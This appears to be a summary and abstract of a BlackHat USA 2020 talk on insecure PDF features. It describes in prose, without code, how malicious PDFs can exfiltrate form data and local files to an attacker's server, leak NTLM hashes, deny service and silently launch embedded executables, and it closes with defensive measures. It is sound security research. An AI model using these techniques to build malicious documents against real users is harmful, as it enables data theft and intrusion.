Portable Document Flaws 101

Conference:  BlackHat USA 2020



PDF documents are complex and have dangerous features that can be exploited by attackers to exfiltrate data, execute code, and leak credentials.
  • PDF viewers that implement the full PDF standard are flawed by design and vulnerable to attacks
  • Limiting resources that a single document can consume can prevent malicious documents from affecting the whole application or operating system
  • Removing or restricting JavaScript can reduce the attack surface
  • Secure PDF processing applications should identify and block dangerous paths in malicious documents
  • PDF forms can be manipulated to exfiltrate data and leak credentials
  • PDF streams can reference external files and be used to exfiltrate arbitrary files from disk
The speaker demonstrated how a PDF form can be manipulated to exfiltrate user input data to an attacker's server by combining the did print and page closed events. They also showed how PDF documents can silently exfiltrate arbitrary files from disk by embedding them in the document and using the submit form action or JavaScript to send them to an external URL. Additionally, they discussed how PDF documents can leak NTLM hashes for Windows user credentials, which can be used for offline cracking or relay attacks.


PDF is a document format on steroids. In this talk, we will dive deep into the PDF specification and reveal its less known, insecure features. We perform a systematic and in-depth analysis of the capabilities of malicious PDF documents leading to vulnerabilities in all major PDF viewers. Our attacks are categorized into four classes: (1) Denial-of-Service attacks affecting the host on which the document is processed. (2) Information disclosure attacks which track who opens a document or leak personal data out of the victim's computer to the attacker's server, such as PDF document form data, local files, or user credentials. (3) Data manipulation attacks which modify form values, write local files on the host system, or mask the displayed content of a document based on the opening application. (4) Execution of code on the victim's machine, by silently launching an embedded executable. Finally, we propose a methodology to systematically protect against attacks based on legitimate-but-dangerous PDF document features.